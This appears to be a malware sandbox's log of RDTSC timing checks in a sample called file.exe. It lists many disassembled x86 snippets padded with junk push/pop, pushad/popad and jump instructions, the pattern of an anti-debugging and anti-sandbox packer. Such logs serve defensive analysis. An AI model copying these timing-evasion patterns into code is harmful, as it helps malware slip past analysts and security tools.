Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D562E1 second address: D56305 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA32872BAE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007FA32872BAE8h 0x00000012 push edx 0x00000013 jg 00007FA32872BAE6h 0x00000019 pop edx 0x0000001a jng 00007FA32872BAEEh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D56305 second address: D5631E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d jc 00007FA328DF73A6h 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5631E second address: D56337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FA32872BAF1h 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D56493 second address: D564B5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA328DF73A8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jl 00007FA328DF73A6h 0x00000013 pop edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jc 00007FA328DF73A8h 0x0000001d push esi 0x0000001e pop esi 0x0000001f push edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D59A39 second address: D59A46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FA32872BAE6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D59A46 second address: D59A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FA328DF73AEh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jo 00007FA328DF73A6h 0x0000001c popad 0x0000001d jno 00007FA328DF73ACh 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D657C3 second address: D657E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA32872BAF4h 0x00000008 jno 00007FA32872BAE6h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D657E4 second address: D657EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6538C second address: D6539E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA32872BAE6h 0x0000000a jc 00007FA32872BAE8h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D69DAC second address: D69DC0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA328DF73A6h 0x00000008 jne 00007FA328DF73A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D69DC0 second address: D69DE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007FA32872BAE6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D69DE4 second address: D69E01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007FA328DF73B1h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6998A second address: D699A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D699A4 second address: D699C3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FA328DF73ABh 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 ja 00007FA328DF73A6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71955 second address: D71959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D828D4 second address: D828D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D828D8 second address: D828DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9F171 second address: C9F17A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C9F17A second address: C9F19B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D81145 second address: D811AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA328DF73A6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FA328DF73B0h 0x00000011 jmp 00007FA328DF73B1h 0x00000016 jg 00007FA328DF73A6h 0x0000001c popad 0x0000001d pop ecx 0x0000001e pushad 0x0000001f jnc 00007FA328DF73AEh 0x00000025 pushad 0x00000026 jno 00007FA328DF73A6h 0x0000002c pushad 0x0000002d popad 0x0000002e push esi 0x0000002f pop esi 0x00000030 popad 0x00000031 jmp 00007FA328DF73B4h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D818AB second address: D818B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA32872BAE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D818B5 second address: D818B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D818B9 second address: D818CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA32872BAECh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D818CF second address: D818E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA328DF73AFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D818E2 second address: D818F5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA32872BAE6h 0x00000008 jng 00007FA32872BAE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D818F5 second address: D8193A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA328DF73B9h 0x00000009 popad 0x0000000a jl 00007FA328DF73A8h 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 pushad 0x00000014 jnl 00007FA328DF73B2h 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push edi 0x0000001e pop edi 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8193A second address: D81940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D81A72 second address: D81A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D82618 second address: D8261C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D86467 second address: D86477 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA328DF73A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D86477 second address: D8647D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8647D second address: D86481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D94313 second address: D94324 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAEBh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA4CC1 second address: DA4CC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA4CC7 second address: DA4CF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FA32872BAF9h 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jng 00007FA32872BAF2h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA4CF1 second address: DA4D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA328DF73A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA328DF73B9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA49F1 second address: DA4A35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jns 00007FA32872BAE6h 0x0000000f popad 0x00000010 jbe 00007FA32872BAFBh 0x00000016 push edi 0x00000017 jnc 00007FA32872BAE6h 0x0000001d pop edi 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FA32872BAEEh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBA75F second address: DBA7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007FA328DF73B0h 0x0000000f jmp 00007FA328DF73ACh 0x00000014 pop eax 0x00000015 push edi 0x00000016 jmp 00007FA328DF73B3h 0x0000001b jnp 00007FA328DF73A6h 0x00000021 pop edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBA7A5 second address: DBA7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBAE82 second address: DBAE86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBB004 second address: DBB03B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF8h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA32872BAF7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBB03B second address: DBB081 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA328DF73B0h 0x00000007 jnp 00007FA328DF73A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 jnl 00007FA328DF73AEh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FA328DF73B4h 0x0000001e jbe 00007FA328DF73A6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBF8C1 second address: DBF8D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jnc 00007FA32872BAE6h 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBF8D4 second address: DBF8E6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA328DF73A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FA328DF73A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBF8E6 second address: DBF94C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 cmc 0x00000009 push 00000004h 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FA32872BAE8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D2664h], ebx 0x0000002b call 00007FA32872BAE9h 0x00000030 jns 00007FA32872BAF4h 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FA32872BAF0h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBF94C second address: DBF96B instructions: 0x00000000 rdtsc 0x00000002 js 00007FA328DF73B2h 0x00000008 jmp 00007FA328DF73ACh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBF96B second address: DBF970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBF970 second address: DBF9B8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA328DF73B0h 0x00000008 jmp 00007FA328DF73AAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007FA328DF73B0h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f jmp 00007FA328DF73B8h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBFBEC second address: DBFC31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FA32872BAE8h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 push dword ptr [ebp+122D2254h] 0x00000028 mov edx, dword ptr [ebp+122D2487h] 0x0000002e call 00007FA32872BAE9h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBFC31 second address: DBFC35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBFC35 second address: DBFC4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBFC4E second address: DBFC55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBFC55 second address: DBFC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007FA32872BAF0h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC0F37 second address: DC0F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA328DF73B3h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E902B8 second address: 4E902CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop ecx 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E902CD second address: 4E9032A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA328DF73B2h 0x00000009 adc eax, 595EB888h 0x0000000f jmp 00007FA328DF73ABh 0x00000014 popfd 0x00000015 mov si, 68FFh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d jmp 00007FA328DF73B2h 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FA328DF73B7h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E9032A second address: 4E90330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90330 second address: 4E90359 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA328DF73ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA328DF73B5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDB110 second address: CDB119 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90400 second address: 4E90404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90404 second address: 4E9040A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E9040A second address: 4E90457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007FA328DF73B4h 0x00000010 push eax 0x00000011 pushad 0x00000012 push edi 0x00000013 pushfd 0x00000014 jmp 00007FA328DF73ACh 0x00000019 sbb ecx, 2B4CEDE8h 0x0000001f jmp 00007FA328DF73ABh 0x00000024 popfd 0x00000025 pop eax 0x00000026 mov si, di 0x00000029 popad 0x0000002a xchg eax, ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90457 second address: 4E9045B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E9045B second address: 4E9045F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E9045F second address: 4E90465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90465 second address: 4E9047B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA328DF73B2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E9047B second address: 4E9047F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E9047F second address: 4E904A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA328DF73B9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E904A6 second address: 4E904AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90505 second address: 4E90596 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov eax, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007FA328DF73A9h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FA328DF73B3h 0x00000016 adc ecx, 026CC00Eh 0x0000001c jmp 00007FA328DF73B9h 0x00000021 popfd 0x00000022 movzx eax, bx 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007FA328DF73AAh 0x0000002c mov eax, dword ptr [esp+04h] 0x00000030 jmp 00007FA328DF73ABh 0x00000035 mov eax, dword ptr [eax] 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov eax, 01411391h 0x0000003f pushfd 0x00000040 jmp 00007FA328DF73AEh 0x00000045 sub cx, C0E8h 0x0000004a jmp 00007FA328DF73ABh 0x0000004f popfd 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90596 second address: 4E905BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E905BC second address: 4E905E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA328DF73B8h 0x0000000a sbb ah, FFFFFFA8h 0x0000000d jmp 00007FA328DF73ABh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E905E9 second address: 4E905EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E905EF second address: 4E905F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E906B8 second address: 4E906BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E906BC second address: 4E906B8 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 153Dh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007FA328DF73AAh 0x0000000e or si, C718h 0x00000013 jmp 00007FA328DF73ABh 0x00000018 popfd 0x00000019 popad 0x0000001a jne 00007FA328DF7359h 0x00000020 mov al, byte ptr [edx] 0x00000022 jmp 00007FA328DF73B2h 0x00000027 inc edx 0x00000028 pushad 0x00000029 popad 0x0000002a test al, al 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90719 second address: 4E9071D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E9071D second address: 4E90723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90723 second address: 4E90746 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 dec edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edx, 4D828320h 0x00000012 mov ax, dx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E90746 second address: 4E90778 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA328DF73B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ebx, dword ptr [edi+01h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA328DF73B7h 0x00000013 rdtsc
